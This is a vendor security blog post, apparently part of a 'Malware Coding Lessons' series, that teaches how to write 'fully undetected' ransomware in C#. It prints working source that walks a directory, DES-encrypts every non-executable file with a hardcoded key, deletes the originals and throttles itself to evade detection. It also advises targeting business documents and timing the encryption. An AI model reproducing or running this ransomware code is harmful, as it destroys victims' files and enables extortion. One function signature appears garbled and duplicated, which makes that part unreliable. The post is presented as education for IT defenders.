Live Cyber Attack Lab 🎯 Watch our IR team detect & respond to a rogue insider trying to steal data! Choose a Session

X

Malware Coding Lessons for IT People, Part II: Fun With FUD Ransomware!

IT Pros

This article is part of the series "Malware Coding Lessons for IT People". Check out the rest:

Let’s not overthink ransomware! It’s just a small malicious piece of code with one devious goal — encrypting all of the user’s important files. It the unfortunate victim wants to recover them he or she will have to pay a hefty amount to retrieve the decryption key.

How hard is ransomware?

Want to learn ransomware basics and earn a CPE credit? Try our free course.

“In just one hour, I’ll teach you the fundamentals of Ransomware and what you can do to protect and prepare for it.”

In this post, I’ll show you how incredibly easy it is to code a FUD (Fully Undetected) ransomware using public Microsoft libraries with C#.

Ransomware 101

As I discussed in my previous post, there are a few ways to get infected with malware – for starters, malicious attachments, rogue websites, and phishing campaigns, as well as some other creative methods I’ll cover in a future post.

Ok, say we’ve clicked on a malicious ransomware file. What’s going to happen next? Persistency!

Persistency is the code used by hacker to enable the malware to survive restarts and to disguise the software so it would be hard to detect (and remove). While persistency is (usually) generic across many different malware families, there are some unique techniques for ransomware. I’ll get into this in a future post.

At its core, ransomware is just software that performs bulk encryption of the data contents in the victim’s file system. Typically, asymmetric encryption — with different keys for encryption and decryption — is preferred by hackers since it is much harder to recover the data.

This asymmetric algorithm is based on the idea of encrypting the files contents with a public key, but using a different private key that only that attacker has for decryption. You can learn more about asymmetric encryption here: https://en.wikipedia.org/wiki/Public-key_cryptography.

The malware can also choose a weaker encryption method, such as symmetric encryption algorithm, in which the same key is used for both encryption and decryption.

To make the code even simpler, we will use an API that does the symmetric encryption algorithm.

And Now the Code

The next part of the software that newbies need to know about is traversing the file system. Essentially, you’re travelling through the directory hierarchy, collecting file pathname, and then feeding the file contents to the encryption engine. Then of course the file has to be written back.

The list of the files to be encrypted is usually the ones companies are dependent on. We’re talking documents, spreadsheets, images, presentations, audio, and emails. By the way, hackers usually will not encrypt movies due to the size and the impact on the malwares performance. That’s a small consolation—employees can be watching movies while IT is restoring from a backup.

Once the files list is generated after navigating the directories, it’s a good idea to wait for an appropriate time to start the encryption. The idea is to then encrypt as much file contents as possible from the list before being detected.

More sophisticated ransomware will attempt to learn the idle time of the infected computer — when there’s CPU available– and slip in the encryption processing at appropriate times to avoid detection.

Enough talk, here’s the code.

First snippet: Choose a random key to encrypt the data with:

string key = "R?\n??i??";

Basically you can choose any key that you like, remember that we are going to choose symmetric algorithm so the key will be used for encrypting and decrypting as well.

Second snippet:   Encrypt an entire directory contents:

private static void EncryptDir(string d,int mili)
        {
            DirectoryInfo dirtoencrypt = new DirectoryInfo(d);
            FileInfo[] file;
            file = dirtoencrypt.GetFiles();
            foreach (FileInfo currentFile in file)
            {
                if (currentFile.Extension.ToLower() != ".exe")
                {
                    string key = "R?\n??i??";
                    EncryptFile(currentFile.FullName, currentFile.FullName + ".axx", key);
                    File.Delete(currentFile.FullName);
                   Thread.Sleep(mili);
                }
            }
        }

 

Third Snippet: The encrypting function, taken directly from MSDN (https://support.microsoft.com/en-us/kb/307010)

static void EncryptFile(string sInputFilename, \
static void EncryptFile(string sInputFilename, string sOutputFilename, string sKey)
        {
            FileStream fsInput = new FileStream(sInputFilename,
             FileMode.Open,
             FileAccess.Read);

            FileStream fsEncrypted = new FileStream(sOutputFilename,
               FileMode.Create,
               FileAccess.Write);
            DESCryptoServiceProvider DES = new DESCryptoServiceProvider();
            DES.Key = ASCIIEncoding.ASCII.GetBytes(sKey);
            DES.IV = ASCIIEncoding.ASCII.GetBytes(sKey);
            ICryptoTransform desencrypt = DES.CreateEncryptor();
            CryptoStream cryptostream = new CryptoStream(fsEncrypted,
               desencrypt,
               CryptoStreamMode.Write);

            byte[] bytearrayinput = new byte[fsInput.Length];
            fsInput.Read(bytearrayinput, 0, bytearrayinput.Length);
            cryptostream.Write(bytearrayinput, 0, bytearrayinput.Length);
            cryptostream.Close();
            fsInput.Close();
            fsEncrypted.Close();
        }


 

That’s it!

A malicious tool with tons of damage potential in less than a 100 lines of code and under 10kb after compiling.

I’ll put together more pieces of the ransomware puzzle in another post.

Avatar

Oded Awaskar

Oded Awaskar is a Security Analyst at Varonis.

 

Does your cybersecurity start at the heart?

Get a highly customized data risk assessment run by engineers who are obsessed with data security.